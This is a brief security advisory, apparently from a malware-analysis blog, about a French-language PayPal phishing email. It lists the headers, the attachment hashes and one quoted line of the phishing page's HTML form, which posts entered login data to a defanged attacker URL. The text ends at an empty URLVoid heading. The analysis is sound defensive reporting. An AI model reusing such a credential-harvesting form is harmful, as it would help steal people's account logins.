New phishing email used to spread HTML files with fake PayPal login forms:
Header details:
Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153]) Received: by ns3.komvos.gr (Postfix, from userid 48) Subject: Attention ! Votre compte PayPal a été limité ! From: Service Paypal Date: Mon, 4 Jun 2012 13:00:12 +0300 (EEST) Content-Disposition: attachment; filename="Informations Compte Paypal .zip" |
There is a ZIP file attached:
File: Informations Compte Paypal .zip Dimensione: 5391 bytes MD5: 2C573252C917A4E4FFC2138E48B50F2B SHA1: 28B36A51D9215F143AC449984A27A74D520679B7 SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9 SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A |
The extracted file is a .HTML file:
File: Informations Compte Paypal .html Dimensione: 22525 bytes MD5: 0500506DEDA37FBC1A7CD19C22173764 SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2 SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2 SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3 SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18 |
From this HTML code:
<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()"> |
We can see that the sensitive data of the form is sent to:
hxxp:// byrongoldworks .com /mainbody.php |
Report from URLVoid: